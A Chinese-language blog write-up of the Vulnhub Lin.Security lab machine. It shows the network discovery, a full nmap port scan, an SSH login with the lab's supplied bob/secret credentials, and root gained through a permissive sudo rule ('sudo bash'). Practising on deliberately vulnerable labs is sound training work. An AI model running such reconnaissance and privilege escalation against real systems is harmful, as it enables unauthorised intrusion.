Vulnhub Lin.Security靶机解题过程

Lin.Security

靶机地址:http://www.vulnhub.com/entry/linsecurity-1,244/
由于靶机的作者直接给出了ssh用户名和密码,本题非常简单

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Lin_Security]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.165.0/16   |   Screen View: Unique Hosts       
                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor           
 192.168.56.100  08:00:27:8c:bf:0a      1      60  PCS Systemtechnik GmbH   
 192.168.56.144  08:00:27:d8:9f:d6      1      60  PCS Systemtechnik GmbH

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.144

NMAP扫描

─$ sudo nmap -sS -sV -sC -p- 192.168.56.144 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 08:56 EDT
Nmap scan report for bogon (192.168.56.144)
Host is up (0.00014s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
|   256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_  256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      42673/tcp6  mountd
|   100005  1,2,3      43901/tcp   mountd
|   100005  1,2,3      48518/udp6  mountd
|   100005  1,2,3      58572/udp   mountd
|   100021  1,3,4      32885/tcp6  nlockmgr
|   100021  1,3,4      35243/udp   nlockmgr
|   100021  1,3,4      40811/tcp   nlockmgr
|   100021  1,3,4      58273/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
40811/tcp open  nlockmgr 1-4 (RPC #100021)
43901/tcp open  mountd   1-3 (RPC #100005)
52643/tcp open  mountd   1-3 (RPC #100005)
57903/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.41 seconds

从NMAP扫描结果可以看到2049开放,NSF共享

Root提权

“To get started you can log onto the host with the credentials: bob/secret“

因为题目本身给出了用户名和密码:bob/secret,因此可以直接用ssh登录

┌──(kali㉿kali)-[~/Vulnhub/Lin_Security]
└─$ ssh bob@192.168.56.144                  
bob@192.168.56.144's password: 

██╗     ██╗███╗   ██╗   ███████╗███████╗ ██████╗██╗   ██╗██████╗ ██╗████████╗██╗   ██╗
██║     ██║████╗  ██║   ██╔════╝██╔════╝██╔════╝██║   ██║██╔══██╗██║╚══██╔══╝╚██╗ ██╔╝
██║     ██║██╔██╗ ██║   ███████╗█████╗  ██║     ██║   ██║██████╔╝██║   ██║    ╚████╔╝ 
██║     ██║██║╚██╗██║   ╚════██║██╔══╝  ██║     ██║   ██║██╔══██╗██║   ██║     ╚██╔╝  
███████╗██║██║ ╚████║██╗███████║███████╗╚██████╗╚██████╔╝██║  ██║██║   ██║      ██║   
╚══════╝╚═╝╚═╝  ╚═══╝╚═╝╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝  ╚═╝╚═╝   ╚═╝      ╚═╝  
Welcome to lin.security | https://in.security | version 1.0

bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo -l
[sudo] password for bob: 
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh,
        /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect,
        /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more,
        /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi,
        /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl,
        /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
bob@linsecurity:~$ sudo bash
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# cd /root
root@linsecurity:/root# ls -alh
total 32K
drwx------  6 root root 4.0K Jul 11  2018 .
drwxr-xr-x 23 root root 4.0K Jul 10  2018 ..
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Jul 10  2018 .cache
-rw-r--r--  1 root root    0 Jul 10  2018 .cloud-locale-test.skip
drwx------  3 root root 4.0K Jul 10  2018 .gnupg
drwxr-xr-x  3 root root 4.0K Jul  9  2018 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Jul  9  2018 .ssh
root@linsecurity:/root#

这个靶机非常简单,只试了其中/bin/bash,因为还有很多其他的命令用于sudo提权。

posted @ 2022-10-31 21:21  Jason_huawen  阅读(92)  评论(0编辑  收藏  举报